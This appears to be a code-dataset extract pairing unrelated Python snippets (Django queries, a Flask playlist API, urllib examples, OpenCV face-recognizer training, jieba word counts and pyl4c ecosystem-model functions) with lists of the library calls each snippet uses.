code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
from django.db.models import Max, Avg, Sum, F
from labs.common.models import Registration
def highest_discount(event_id=1):
"""
>>> SELECT MAX(registration.discount) AS max_discount FROM registration
WHERE registration.event_id = event_id
"""
registrations = Registration.objects.filter(event_id=event_id)
max_dicount = registrations.aggregate(max_discount=Max('discount'))
print(max_dicount)
def total_sold_tickets(event_id=1):
"""
>>> SELECT SUM(registration.ticket) AS total_ticket FROM registration
WHERE registration.event_id = event_id
"""
registrations = Registration.objects.filter(event_id=event_id)
max_dicount = registrations.aggregate(total_ticket=Sum('ticket'))
print(max_dicount)
def average_tickets_per_registration():
"""
>>> SELECT AVG(registration.ticket) AS avg_ticket FROM registration
"""
avg_ticket = Registration.objects.aggregate(avg_ticket=Avg('ticket'))
print(avg_ticket)
def registration_tickets_price():
"""
>>> SELECT ..., (registration.ticket * ((100 - registration.discount) * event.ticket_price) / 100) AS price
FROM registration INNER JOIN event ON (registration.event_id = event.id)
INNER JOIN member ON (registration.member_id = member.id)
"""
tickets_price = F('ticket') * (100 - F('discount')) * F('event__ticket_price') / 100
registration_list = Registration.objects.annotate(
price=tickets_price).select_related()
for r in registration_list:
print("{0} pays {1} for {2} tickt(s) with {3}% discount".format(
r.member, r.price, r.ticket, r.discount))
def event_income():
"""
>>> SELECT event.name, SUM((((registration.ticket * (100 - registration.discount)) * event.ticket_price) / 100)) AS price
FROM registration INNER JOIN event ON (registration.event_id = event.id) GROUP BY event.name
"""
tickets_price = F('ticket') * (100 - F('discount')) * F('event__ticket_price') / 100
registration_list = Registration.objects.values('event__name')
# ==> group by event
events_income = registration_list.annotate(income=Sum(tickets_price))
for e in events_income:
print("{event__name} reaches {income}$ as an income".format(**e))
|
[
"django.db.models.Max",
"labs.common.models.Registration.objects.annotate",
"django.db.models.Sum",
"labs.common.models.Registration.objects.filter",
"django.db.models.F",
"django.db.models.Avg",
"labs.common.models.Registration.objects.values"
] |
[((286, 332), 'labs.common.models.Registration.objects.filter', 'Registration.objects.filter', ([], {'event_id': 'event_id'}), '(event_id=event_id)\n', (313, 332), False, 'from labs.common.models import Registration\n'), ((623, 669), 'labs.common.models.Registration.objects.filter', 'Registration.objects.filter', ([], {'event_id': 'event_id'}), '(event_id=event_id)\n', (650, 669), False, 'from labs.common.models import Registration\n'), ((2029, 2071), 'labs.common.models.Registration.objects.values', 'Registration.objects.values', (['"""event__name"""'], {}), "('event__name')\n", (2056, 2071), False, 'from labs.common.models import Registration\n'), ((388, 403), 'django.db.models.Max', 'Max', (['"""discount"""'], {}), "('discount')\n", (391, 403), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((725, 738), 'django.db.models.Sum', 'Sum', (['"""ticket"""'], {}), "('ticket')\n", (728, 738), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((952, 965), 'django.db.models.Avg', 'Avg', (['"""ticket"""'], {}), "('ticket')\n", (955, 965), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1360, 1384), 'django.db.models.F', 'F', (['"""event__ticket_price"""'], {}), "('event__ticket_price')\n", (1361, 1384), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1415, 1465), 'labs.common.models.Registration.objects.annotate', 'Registration.objects.annotate', ([], {'price': 'tickets_price'}), '(price=tickets_price)\n', (1444, 1465), False, 'from labs.common.models import Registration\n'), ((1974, 1998), 'django.db.models.F', 'F', (['"""event__ticket_price"""'], {}), "('event__ticket_price')\n", (1975, 1998), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((2152, 2170), 'django.db.models.Sum', 'Sum', (['tickets_price'], {}), '(tickets_price)\n', (2155, 2170), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1322, 1333), 'django.db.models.F', 'F', (['"""ticket"""'], {}), "('ticket')\n", (1323, 1333), False, 'from 
django.db.models import Max, Avg, Sum, F\n'), ((1936, 1947), 'django.db.models.F', 'F', (['"""ticket"""'], {}), "('ticket')\n", (1937, 1947), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1343, 1356), 'django.db.models.F', 'F', (['"""discount"""'], {}), "('discount')\n", (1344, 1356), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1957, 1970), 'django.db.models.F', 'F', (['"""discount"""'], {}), "('discount')\n", (1958, 1970), False, 'from django.db.models import Max, Avg, Sum, F\n')]
|
from flask import Flask, request, json
from playlist_compare import playlistService, helloService, searchService
app = Flask(__name__)
@app.route("/")
def helloRoute():
data = helloService.hello()
return json.jsonify(data)
@app.route("/list")
def listAll():
token = request.args.get("token")
username = request.args.get("username")
data = playlistService.getAll(token, username)
return json.jsonify(data)
@app.route("/listOne")
def listOne():
token = request.args.get("token")
username = request.args.get("username")
playlist = request.args.get("playlist")
data = playlistService.getTracks(token, username, playlist)
return json.jsonify(data)
@app.route("/listDuplicates")
def listDuplicates():
token = request.args.get("token")
username = request.args.get("username")
data = playlistService.getDuplicates(token, username)
return json.jsonify(data)
@app.route("/search")
def searchRoute():
data = searchService.search()
return json.jsonify(data)
|
[
"playlist_compare.helloService.hello",
"flask.request.args.get",
"flask.Flask",
"flask.json.jsonify",
"playlist_compare.searchService.search",
"playlist_compare.playlistService.getAll",
"playlist_compare.playlistService.getDuplicates",
"playlist_compare.playlistService.getTracks"
] |
[((121, 136), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (126, 136), False, 'from flask import Flask, request, json\n'), ((184, 204), 'playlist_compare.helloService.hello', 'helloService.hello', ([], {}), '()\n', (202, 204), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((216, 234), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (228, 234), False, 'from flask import Flask, request, json\n'), ((284, 309), 'flask.request.args.get', 'request.args.get', (['"""token"""'], {}), "('token')\n", (300, 309), False, 'from flask import Flask, request, json\n'), ((325, 353), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (341, 353), False, 'from flask import Flask, request, json\n'), ((366, 405), 'playlist_compare.playlistService.getAll', 'playlistService.getAll', (['token', 'username'], {}), '(token, username)\n', (388, 405), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((417, 435), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (429, 435), False, 'from flask import Flask, request, json\n'), ((488, 513), 'flask.request.args.get', 'request.args.get', (['"""token"""'], {}), "('token')\n", (504, 513), False, 'from flask import Flask, request, json\n'), ((529, 557), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (545, 557), False, 'from flask import Flask, request, json\n'), ((573, 601), 'flask.request.args.get', 'request.args.get', (['"""playlist"""'], {}), "('playlist')\n", (589, 601), False, 'from flask import Flask, request, json\n'), ((614, 666), 'playlist_compare.playlistService.getTracks', 'playlistService.getTracks', (['token', 'username', 'playlist'], {}), '(token, username, playlist)\n', (639, 666), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((678, 696), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), 
'(data)\n', (690, 696), False, 'from flask import Flask, request, json\n'), ((763, 788), 'flask.request.args.get', 'request.args.get', (['"""token"""'], {}), "('token')\n", (779, 788), False, 'from flask import Flask, request, json\n'), ((804, 832), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (820, 832), False, 'from flask import Flask, request, json\n'), ((845, 891), 'playlist_compare.playlistService.getDuplicates', 'playlistService.getDuplicates', (['token', 'username'], {}), '(token, username)\n', (874, 891), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((903, 921), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (915, 921), False, 'from flask import Flask, request, json\n'), ((976, 998), 'playlist_compare.searchService.search', 'searchService.search', ([], {}), '()\n', (996, 998), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((1010, 1028), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (1022, 1028), False, 'from flask import Flask, request, json\n')]
|
import numpy as np
import torch
def person_embed(speaker_ids, person_vec):
'''
:param speaker_ids: torch.Tensor ( T, B)
:param person_vec: numpy array (num_speakers, 100)
:return:
speaker_vec: torch.Tensor (T, B, D)
'''
speaker_vec = []
for t in speaker_ids:
speaker_vec.append([person_vec[int(i)].tolist() if i != -1 else [0] * 100 for i in t])
speaker_vec = torch.FloatTensor(speaker_vec)
return speaker_vec
|
[
"torch.FloatTensor"
] |
[((410, 440), 'torch.FloatTensor', 'torch.FloatTensor', (['speaker_vec'], {}), '(speaker_vec)\n', (427, 440), False, 'import torch\n')]
|
# Generated by Django 2.1.4 on 2019-01-03 23:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('seimas', '0030_auto_20190103_2234'),
]
operations = [
migrations.AlterField(
model_name='committee',
name='slug',
field=models.SlugField(unique=True),
),
migrations.AlterField(
model_name='fraction',
name='slug',
field=models.SlugField(unique=True),
),
]
|
[
"django.db.models.SlugField"
] |
[((336, 365), 'django.db.models.SlugField', 'models.SlugField', ([], {'unique': '(True)'}), '(unique=True)\n', (352, 365), False, 'from django.db import migrations, models\n'), ((487, 516), 'django.db.models.SlugField', 'models.SlugField', ([], {'unique': '(True)'}), '(unique=True)\n', (503, 516), False, 'from django.db import migrations, models\n')]
|
import jieba #分词库
import jieba.analyse
import pymongo
import redis
import os
import re
import json
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['job']
collection = db['position']
data = collection.find({})
text = ""
for item in data:
text += item['body']
pwd = os.path.split(os.path.realpath(__file__))[0]
stopWord = pwd+'/stop.txt'
jieba.analyse.set_stop_words(stopWord)
cut_text= jieba.cut(text)
it_text = dict({})
for x in cut_text:
G = re.match('[a-zA-Z]+',x)
if G:
key = G.group()
keys = map(lambda x: x.lower(), it_text.keys())
if key.lower() in keys:
it_text[key.lower()] += 1
else:
it_text[key.lower()] = 1
with open("word.json","w+",encoding="utf-8") as file:
data = file.write(json.dumps((it_text)))
result= "/".join(cut_text)#必须给个符号分隔开分词结果来形成字符串,否则不能绘制词云
data = jieba.analyse.extract_tags(result.replace('/',''), withWeight=False, allowPOS=())
#print(",".join(data))
|
[
"pymongo.MongoClient",
"jieba.cut",
"os.path.realpath",
"re.match",
"json.dumps",
"jieba.analyse.set_stop_words"
] |
[((125, 174), 'pymongo.MongoClient', 'pymongo.MongoClient', ([], {'host': '"""127.0.0.1"""', 'port': '(27017)'}), "(host='127.0.0.1', port=27017)\n", (144, 174), False, 'import pymongo\n'), ((382, 420), 'jieba.analyse.set_stop_words', 'jieba.analyse.set_stop_words', (['stopWord'], {}), '(stopWord)\n', (410, 420), False, 'import jieba\n'), ((431, 446), 'jieba.cut', 'jieba.cut', (['text'], {}), '(text)\n', (440, 446), False, 'import jieba\n'), ((494, 518), 're.match', 're.match', (['"""[a-zA-Z]+"""', 'x'], {}), "('[a-zA-Z]+', x)\n", (502, 518), False, 'import re\n'), ((324, 350), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (340, 350), False, 'import os\n'), ((806, 825), 'json.dumps', 'json.dumps', (['it_text'], {}), '(it_text)\n', (816, 825), False, 'import json\n')]
|
from urllib.parse import urlencode, urldefrag, quote, unquote
import requests
# from requests.urllib3 import urlretrieve
import urllib
from urllib.request import urlretrieve
mydict = {
"Name": "<NAME>",
"address": "test address",
"fav char": "<NAME>"
}
strUrl = urlencode(mydict)
print(strUrl)
string = urlencode({"v": "what is your favroute editor, VS Code, atom , sublime"})
print(string)
sdecode = urldefrag(string)
print(sdecode)
qt = quote('Famous Quote:"I think, there I am')
print(qt)
print(unquote(qt))
fd = urllib.request.urlopen("ftp://ftp.oreilly.com")
print(fd.read())
fd.close()
ob = urlretrieve("ftp://ftp.oreilly.com", "menu.txt")
print(ob)
"""
retrieve.py example
"""
def callback(blocknum, blocksize, totalsize):
print("Downloaded " + str((blocknum * blocksize)))
print(" of ", totalsize)
urlretrieve("http://www.example.com/pyxml.xml", "px.xml", callback)
print("Download Complete")
|
[
"urllib.parse.unquote",
"urllib.parse.urldefrag",
"urllib.parse.urlencode",
"urllib.request.urlopen",
"urllib.request.urlretrieve",
"urllib.parse.quote"
] |
[((279, 296), 'urllib.parse.urlencode', 'urlencode', (['mydict'], {}), '(mydict)\n', (288, 296), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((321, 394), 'urllib.parse.urlencode', 'urlencode', (["{'v': 'what is your favroute editor, VS Code, atom , sublime'}"], {}), "({'v': 'what is your favroute editor, VS Code, atom , sublime'})\n", (330, 394), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((420, 437), 'urllib.parse.urldefrag', 'urldefrag', (['string'], {}), '(string)\n', (429, 437), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((459, 501), 'urllib.parse.quote', 'quote', (['"""Famous Quote:"I think, there I am"""'], {}), '(\'Famous Quote:"I think, there I am\')\n', (464, 501), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((539, 586), 'urllib.request.urlopen', 'urllib.request.urlopen', (['"""ftp://ftp.oreilly.com"""'], {}), "('ftp://ftp.oreilly.com')\n", (561, 586), False, 'import urllib\n'), ((622, 670), 'urllib.request.urlretrieve', 'urlretrieve', (['"""ftp://ftp.oreilly.com"""', '"""menu.txt"""'], {}), "('ftp://ftp.oreilly.com', 'menu.txt')\n", (633, 670), False, 'from urllib.request import urlretrieve\n'), ((843, 910), 'urllib.request.urlretrieve', 'urlretrieve', (['"""http://www.example.com/pyxml.xml"""', '"""px.xml"""', 'callback'], {}), "('http://www.example.com/pyxml.xml', 'px.xml', callback)\n", (854, 910), False, 'from urllib.request import urlretrieve\n'), ((519, 530), 'urllib.parse.unquote', 'unquote', (['qt'], {}), '(qt)\n', (526, 530), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n')]
|
import decimal
import json
import typing
from datetime import datetime
import baseline_cloud.core.date
from baseline_cloud import core
class JSONEncoder(json.JSONEncoder):
def default(self, o: typing.Any) -> typing.Any:
if isinstance(o, datetime):
return core.date.format_utc(o)
if isinstance(o, decimal.Decimal):
return float(o)
return super(JSONEncoder, self).default(o)
|
[
"baseline_cloud.core.date.format_utc"
] |
[((282, 305), 'baseline_cloud.core.date.format_utc', 'core.date.format_utc', (['o'], {}), '(o)\n', (302, 305), False, 'from baseline_cloud import core\n')]
|
import os, sys
import json
from collections import defaultdict
import numpy as np
import pandas as pd
dna_pair = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}
amino_acid_index_table = {
'A': 0,
'B': 20,
'C': 1,
'D': 2,
'E': 3,
'F': 4,
'G': 5,
'H': 6,
'I': 7,
'J': 20,
'K': 8,
'L': 9,
'M': 10,
'N': 11,
'O': 20,
'P': 12,
'Q': 13,
'R': 14,
'S': 15,
'T': 16,
'U': 20,
'V': 17,
'W': 18,
'X': 20,
'Y': 19,
'Z': 20,
}
ss3_encode = {'H': 0, 'E': 1, 'C': 2}
ss8_encode = {'H': 0, 'G': 1, 'I': 2, 'B': 3, 'E': 4, 'S': 5, 'T': 6, 'C': 7}
ss8_ss3_encode = {
'H': 0,
'G': 0,
'I': 0,
'B': 1,
'E': 1,
'S': 2,
'T': 2,
'C': 2
}
def read_fasta(fasta_path, name_rule=None):
fasta = defaultdict(str)
seq = ""
print(fasta_path)
with open(fasta_path) as f:
for line in f:
print(line)
if len(line.strip()) == 0:
continue
if line.startswith('>'):
print(line)
if seq != '':
fasta[head] = seq
seq = ''
if name_rule is None:
head = line.strip().split()[0][1:]
else:
head = name_rule(line)
else:
seq += line.strip()
if seq != "":
fasta[head] = seq
return fasta
def aa_index(aa):
return amino_acid_index_table.get(aa, 20)
def get_complement_dna(dna):
return ''.join([dna_pair.get(a, '-') for a in dna.strip()])
#reverse strand
def get_reverse_dna(dna):
r = ''.join([dna_pair[a] for a in dna])
return r[::-1]
def read_vep(input_path, read_id=True):
head = [
'grch38_chrom', 'gch38_pos', 'ref', 'alt', 'ref_codon', 'alt_codon',
'frame', 'transcript_stable_id', 'protein_len', 'aa_pos', 'ref_aa',
'alt_aa'
]
skiprows = 0
with open(input_path) as f:
for line in f:
if not line.startswith('## '):
break
skiprows += 1
df = pd.read_csv(input_path, sep='\t', skiprows=skiprows)
#filters
df = df[df['CANONICAL'] == 'YES']
if 'VARIANT_CLASS' in df.columns:
df = df[df['VARIANT_CLASS'] == 'SNV']
df = df[df['Consequence'].apply(lambda x: 'missense_variant' in x)]
if read_id:
df['label'] = df['#Uploaded_variation'].apply(
lambda x: int(x.split('|')[-1]))
df['source'] = df['#Uploaded_variation'].apply(
lambda x: x.split('|')[2])
else:
df['label'] = -1
df['source'] = 'unknown'
df['transcript_stable_id'] = df['Feature'].apply(lambda x: x.split('.')[0])
df = df[df['transcript_stable_id'].apply(lambda x: x in used_tr)]
df['protein_var'] = df.apply(_get_protein_var, axis=1)
df['var'] = df.apply(_get_var, axis=1)
def _get_af(x):
if type(x) == str and x == '-':
return 0.0
return float(x)
df['af'] = df['gnomAD_AF'].apply(_get_af)
def _get_frame(x):
r = 0
for a in x:
if a.isupper():
return r
r += 1
assert 1 == 2
return 0
df['frame'] = df['Codons'].apply(_get_frame)
df = df.drop_duplicates(['var'])
df = df[head]
return df
def parse_uniprot_isoform():
pass
|
[
"collections.defaultdict",
"pandas.read_csv"
] |
[((804, 820), 'collections.defaultdict', 'defaultdict', (['str'], {}), '(str)\n', (815, 820), False, 'from collections import defaultdict\n'), ((2114, 2166), 'pandas.read_csv', 'pd.read_csv', (['input_path'], {'sep': '"""\t"""', 'skiprows': 'skiprows'}), "(input_path, sep='\\t', skiprows=skiprows)\n", (2125, 2166), True, 'import pandas as pd\n')]
|
import os
import cv2
from matplotlib.pyplot import gray
import numpy as np
people = ['<NAME>', '<NAME>', '<NAME>', 'Madonna', '<NAME>']
DIR = r'/home/senai/tiago-projects/opencv-course/Resources/Faces/train'
haar_cascade = cv2.CascadeClassifier('/home/senai/tiago-projects/opencv-course/face_detection/haar_face.xml')
features = []
labels = []
def create_train():
for person in people:
path = os.path.join(DIR, person)
label = people.index(person)
for img in os.listdir(path):
img_path = os.path.join(path, img)
img_array = cv2.imread(img_path)
gray = cv2.cvtColor(img_array, cv2.COLOR_BGR2GRAY)
faces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=4)
for(x,y,w,h) in faces_rect:
faces_roi = gray[y:y+h, x:x+w]
features.append(faces_roi)
labels.append(label)
create_train()
features = np.array(features)
labels = np.array(labels)
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
# Train the recognizer on the features list and the labels list
face_recognizer.train(features, labels)
face_recognizer.save('face_trained.yml')
np.save('features.npy', features)
np.save('labels.npy', labels)
|
[
"numpy.save",
"cv2.face.LBPHFaceRecognizer_create",
"cv2.cvtColor",
"cv2.imread",
"numpy.array",
"cv2.CascadeClassifier",
"os.path.join",
"os.listdir"
] |
[((224, 323), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""/home/senai/tiago-projects/opencv-course/face_detection/haar_face.xml"""'], {}), "(\n '/home/senai/tiago-projects/opencv-course/face_detection/haar_face.xml')\n", (245, 323), False, 'import cv2\n'), ((956, 974), 'numpy.array', 'np.array', (['features'], {}), '(features)\n', (964, 974), True, 'import numpy as np\n'), ((985, 1001), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (993, 1001), True, 'import numpy as np\n'), ((1021, 1057), 'cv2.face.LBPHFaceRecognizer_create', 'cv2.face.LBPHFaceRecognizer_create', ([], {}), '()\n', (1055, 1057), False, 'import cv2\n'), ((1205, 1238), 'numpy.save', 'np.save', (['"""features.npy"""', 'features'], {}), "('features.npy', features)\n", (1212, 1238), True, 'import numpy as np\n'), ((1239, 1268), 'numpy.save', 'np.save', (['"""labels.npy"""', 'labels'], {}), "('labels.npy', labels)\n", (1246, 1268), True, 'import numpy as np\n'), ((408, 433), 'os.path.join', 'os.path.join', (['DIR', 'person'], {}), '(DIR, person)\n', (420, 433), False, 'import os\n'), ((491, 507), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (501, 507), False, 'import os\n'), ((532, 555), 'os.path.join', 'os.path.join', (['path', 'img'], {}), '(path, img)\n', (544, 555), False, 'import os\n'), ((581, 601), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (591, 601), False, 'import cv2\n'), ((621, 664), 'cv2.cvtColor', 'cv2.cvtColor', (['img_array', 'cv2.COLOR_BGR2GRAY'], {}), '(img_array, cv2.COLOR_BGR2GRAY)\n', (633, 664), False, 'import cv2\n')]
|
'''
Specialized scientific functions for biogeophysical variables and L4C model
processes.
'''
import numpy as np
from functools import partial
from scipy.ndimage import generic_filter
from scipy.linalg import solve_banded
from scipy.sparse import dia_matrix
from pyl4c import suppress_warnings
from pyl4c.data.fixtures import HDF_PATHS, BPLUT
from pyl4c.utils import get_pft_array, subset
from pyl4c.stats import ols, ols_variance, linear_constraint
def arrhenius(
tsoil, beta0: float, beta1: float = 66.02, beta2: float = 227.13):
r'''
The Arrhenius equation for response of enzymes to (soil) temperature,
constrained to lie on the closed interval [0, 1].
$$
f(T_{SOIL}) = \mathrm{exp}\left[\beta_0\left( \frac{1}{\beta_1} -
\frac{1}{T_{SOIL} - \beta_2} \right) \right]
$$
Parameters
----------
tsoil : numpy.ndarray
Array of soil temperature in degrees K
beta0 : float
Coefficient for soil temperature (deg K)
beta1 : float
Coefficient for ... (deg K)
beta2 : float
Coefficient for ... (deg K)
Returns
-------
numpy.ndarray
Array of soil temperatures mapped through the Arrhenius function
'''
a = (1.0 / beta1)
b = np.divide(1.0, np.subtract(tsoil, beta2))
# This is the simple answer, but it takes on values >1
y0 = np.exp(np.multiply(beta0, np.subtract(a, b)))
# Constrain the output to the interval [0, 1]
return np.where(y0 > 1, 1, np.where(y0 < 0, 0, y0))
def bias_correction_parameters(
series, npoly: int = 1, cutoff: float = 1, var_cutoff: float = None,
add_intercept: bool = True):
'''
Calculate the bias correction parameters for two overlapping time series,
nominally the Nature Run and L4C Operational products, of a given
variable using quantile mapping. For example, can correct the bias in
Nature Run (2000-2017) against the L4C Ops record (2015-Present) by
fitting bias correction parameters for the overlap period 2015-2017.
Model can be specified:
y = alpha + X beta_0 + X^2 beta_1 + ...
NOTE: Because Nature Run and L4C Ops compare very well in some locations,
a degree-1 polynomial (straight line) is fit first (regardless of npoly);
if this solution produces corrections that are <1 gC m^-2, the degree-1
solution is used. In some areas, there is a strong linear correspondence
between most measurements but a small number have a super-linear
relationship that is poorly fit by a degree-2 polynomial; in these cases
(where model variance of the degree-2 fit is > var_cutoff), the degree-1
solution is used. Forcing the line of best fit through the origin (with
intercept=False) is also not recommended.
Parameters
----------
series : numpy.ndarray
A (t x 2) NumPy array where t rows correspond to t time steps and
each column is a product; the first column is the reference product
or dependent variable in the linear bias correction.
npoly : int
Degree of the polynomial to use in bias correction (Default: 1)
cutoff : float
Cutoff for the degree-1 bias correction, in data units (e.g.,
1 g C m-2 day-1); defaults to 1.0, i.e., the residual after correction
must be greater than 1 g C m-2 day-1, which is the average impact of
L4SM versus model-only observations. If this cutoff is exceeded, the
degree-1 solution is returned.
var_cutoff : float or None
Cutoff in variance for higher-order solutions; if the residual model
variance exceeds this threshold for the degree-N solution, then return
the degree (N-1) solution (Default: None)
add_intercept : bool
True to add a the y-intercept term (Default: True)
Returns
-------
numpy.ndarray
A vector of length N + 1 where N is the degree of the polynomial
fit requested
'''
def xmat(x, npoly):
# Creates the design/ model matrix for a polynomial series
# Add a column for each power of the requested polynomial series
x = np.repeat(x.reshape((t, 1)), npoly, axis = 1)
for i in range(1, npoly):
# Calculate X^n for n up to N powers
x[:,i] = np.power(x[:,0], npoly + 1)
return x
def fit(x, y, npoly):
# Fits the model using OLS
# If all of the Y values are NaN
if np.all(np.isnan(y)): return np.ones((npoly + 1,)) * np.nan
try:
return ols(xmat(x, npoly), y, add_intercept)
except np.linalg.linalg.LinAlgError:
return np.ones((npoly + 1,)) * np.nan
# Sort the input series from low -> high
t = series.shape[0]
y = np.sort(series[:,0])
x = np.sort(series[:,1])
# For some pixels, the time series has zero variance, and this can produce
# unstable OLS estimates (e.g., zero slope)
if np.var(y) == 0 or np.var(x) == 0:
# Return coefficients: (0, 1, 0, ..., 0)
return np.hstack(((0, 1), list(0 for i in range(1, npoly))))
if np.var(y) == 0 and np.var(x) == 0:
# Intercept (mean) is the only necessary predictor
return np.hstack(((1, 0), list(0 for i in range(1, npoly))))
fit1 = np.hstack(
(fit(x, y, npoly = 1), list(0 for i in range(1, npoly))))
if npoly == 1:
return fit1
# First, try a degree-1 polynomial (straight-line) fit; if the bias
# correction slope is such that the correction is < 1 gC/m^-2,
# which is similar to the average impact of L4SM vs. model-only
# observations, then use the degree-1 fit parameters
if x.mean() - (fit1[1] * x.mean()) < cutoff:
return fit1
# Second, starting with the simpler model, check if progressively more
# complicated models (up to a maximum of npoly) really do fit the data
# better; if not, or if the model variance is above a cutoff, use the
# next most-complicated model (last_model)
last_model = fit1 # Starting with the simplest model...
for p in range(2, npoly + 1):
model = fit(x, y, npoly = p)
# Calculates unbiased estimate of model variance
model_var = ols_variance(xmat(x, p), y, model, add_intercept)
# Without a cutoff for guidance, if the model variance of the degree-1
# fit is lower than that of the degree-2 fit...
if var_cutoff is None:
if model_var > ols_variance(
xmat(x, 1), y, last_model[0:p], add_intercept):
return last_model
else:
if model_var > var_cutoff:
return last_model
last_model = model
# Unless a simpler model was better, return coefficients for the requested
# polynomial degree
return model
def climatology365(series, dates):
'''
Computes a 365-day climatology for different locations from a time series
of length T. Ignores leap days. The climatology could then be indexed
using ordinals generated by `ordinals365()`.
Parameters
----------
series : numpy.ndarray
T x ... array of data
dates : list or tuple
Sequence of datetime.datetime or datetime.date instances
Returns
-------
numpy.ndarray
'''
@suppress_warnings
def calc_climatology(x):
return np.array([
np.nanmean(x[ordinal == day,...], axis = 0)
for day in range(1, 366)
])
# Get first and last day of the year (DOY)
ordinal = np.array([
# Finally, subtract 1 from each day in a leap year after Leap Day
(doy - 1) if ((dates[i].year % 4 == 0) and doy >= 60) else doy
for i, doy in enumerate([
# Next, fill in 0 wherever Leap Day occurs
0 if (dates[i].year % 4 == 0 and doy == 60) else doy
for i, doy in enumerate([
# First, convert datetime.datetime to ordinal day-of-year (DOY)
int(dt.strftime('%j')) for dt in dates
])
])
])
return calc_climatology(series)
def daynight_partition(arr_24hr, updown, reducer = 'mean'):
'''
Partitions a 24-hour time series array into daytime and nighttime values,
then calculates the mean in each group. Daytime is defined as when the sun
is above the horizon; nighttime is the complement.
Parameters
----------
arr_24hr : numpy.ndarray
A size (24 x ...) array; the first axis must have 24 elements
corresponding to the measurement in each hour
updown: numpy.ndarray
A size (2 x ...) array, compatible with arr_24hr, where the first axis
has the hour of sunrise and sunset, in that order, for each element
reducer : str
One of "mean" or "sum" indicating whether an average or a total of the
daytime/ nighttime values should be calculated; e.g., for "mean", the
hourly values from daytime hours are added up and divided by the
length of the day (in hours).
Returns
-------
numpy.ndarray
A size (2 x ...) array where the first axis enumerates the daytime and
nighttime mean values, respectively
'''
assert reducer in ('mean', 'sum'),\
'Argument "reducer" must be one of: "mean", "sum"'
# Prepare single-valued output array
arr_daytime = np.zeros(arr_24hr.shape[1:])
arr_nighttime = arr_daytime.copy()
daylight_hrs = arr_daytime.copy().astype(np.int16)
# Do sunrise and sunset define an interval? (Sunset > Sunrise)?
inside_interval = np.apply_along_axis(lambda x: x[1] > x[0], 0, updown)
# Or is the sun never up?
never_up = np.logical_and(updown[0,...] == -1, updown[1,...] == -1)
# Iteratively sum daytime VPD and temperature values
for hr in range(0, 24):
# Given only hour of sunrise/set on a 24-hour clock...
# if sun rises and sets on same day: SUNRISE <= HOUR <= SUNSET;
# if sun sets on next day: either SUNRISE <= HOUR or HOUR <= SUNSET;
sun_is_up = np.logical_or( # Either...
np.logical_and(inside_interval, # ...Rises and sets same day
np.logical_and(updown[0,...] <= hr, hr <= updown[1,...])),
np.logical_and(~inside_interval, # ...Sets on next day
np.logical_or(updown[0,...] <= hr, hr <= updown[1,...])))
# For simplicity, compute a 24-hour mean even if the sun never rises;
# there's no way to know what the "correct" daytime value is
mask = np.logical_or(never_up, sun_is_up)
np.add(np.where(
mask, arr_24hr[hr,...], 0), arr_daytime, out = arr_daytime)
np.add(np.where(
~mask, arr_24hr[hr,...], 0), arr_nighttime, out = arr_nighttime)
# Keep track of the denominator (hours) for calculating the mean;
# note that this over-estimates actual daylight hours by 1 hour
# but results in the correct denominator for the sums above
np.add(np.where(mask, 1, 0), daylight_hrs, out = daylight_hrs)
arr_24hr = None
# Calculate mean quantities
if reducer == 'mean':
arr_daytime = np.divide(arr_daytime, daylight_hrs)
arr_nighttime = np.divide(arr_nighttime, 24 - daylight_hrs)
# For sites where the sun is always above/ below the horizon, set missing
# nighttime values to zero
arr_nighttime[~np.isfinite(arr_nighttime)] = 0
return np.stack((arr_daytime, arr_nighttime))
def e_mult(params, tmin, vpd, smrz, ft):
    '''
    Environmental-constraint multiplier on gross primary productivity
    (GPP), E_mult. Each driver is passed through a ramp function built
    from the current parameter set: "tmin0"/"tmin1" bound minimum air
    temperature, "vpd0"/"vpd1" bound vapor pressure deficit (reversed
    ramp), "smrz0"/"smrz1" bound root-zone soil moisture, and "ft0" is
    the multiplier applied under frozen-ground conditions.

    Parameters
    ----------
    params : dict
        A dict-like data structure with named model parameters
    tmin : numpy.ndarray
        (T x N) minimum air temperature (deg K); T time steps, N sites
    vpd : numpy.ndarray
        (T x N) vapor pressure deficit (Pa); T time steps, N sites
    smrz : numpy.ndarray
        (T x N) root-zone soil moisture wetness (%); T time steps, N sites
